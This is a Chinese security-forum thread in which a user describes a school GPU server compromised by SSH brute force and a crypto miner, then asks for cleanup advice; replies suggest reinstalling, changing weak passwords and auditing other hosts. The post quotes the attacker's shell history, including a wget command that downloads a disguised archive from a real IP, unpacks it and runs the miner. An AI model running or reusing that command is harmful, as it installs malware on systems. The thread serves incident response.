吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2076|回复: 9
收起左侧

学校服务器感染挖矿病毒lasto.jpg

[复制链接]
LiterMa 发表于 2024-3-8 20:27
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
学校的深度学习服务器由于开过阿里云内网穿透被人暴力破解开了密码,然后被感染的服务器一直在局域网内不断尝试ssh爆破并安装挖矿脚本。
查看ubuntu操作history时发现了嫌疑人的的操作记录
[Asm] 纯文本查看 复制代码
 1979  2024-03-08 14:34:23wget -c 162.241.141.162/lasto.jpg;tar xzvf lasto.jpg;rm -rf lasto.jpg;cd .cache;./m lan
 1980  2024-03-08 14:34:23nvidia-smi
 1981  2024-03-08 14:34:23ps -x
 1982  2024-03-08 14:34:23nvidia-smi
 1983  2024-03-08 14:34:23sudo bash
 1984  2024-03-08 14:34:23nvidia-smi
 1985  2024-03-08 14:34:23exit



我按上面ip地址下载好了一份病毒样本在windows上进行解压分析,内容.cache如下:
image.png
火绒分析为病毒文件
image.png
我在服务器上删除了这几个文件。

服务器上的挖矿程序为查看定时任务时发现
image.png
cd到该.cache文件发现如下文件,下图中的upd文件已被我紧急删除防止挖矿的java名称程序启动。
image.png
upd文件内容如下:
image.png


现在我把这些文件全删除了,服务器是否还会有问题?接下来该做些什么?



发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

a940284833 发表于 2024-3-9 20:56
maybe reinstalling OS
FireMicROPEP1 发表于 2024-3-14 10:30
修改弱口令
排查该服务器网络可达的机器是否也感染病毒
排查感染服务器时间前后有变化的文件(比如服务项、SSH公钥等)
hacker2k 发表于 2024-3-15 10:08
我自己的服务器有段时间也是被人挖矿,但是没种马
4amxxxxxlu 发表于 2024-3-25 16:10
楼主可以分享样本吗~感谢
爱飞的猫 发表于 2024-4-5 10:28
可以试试配个脚本定期上报显卡使用率和对应进程信息,然后隔一段时间看一下。
chenkeai深蓝 发表于 2024-4-11 13:26
楼主发个样本,我正在学习网络安全的溯源反制,借个样本学习学习
famoustang12888 发表于 2024-4-11 14:17
都是高手啊
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-12 12:43

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表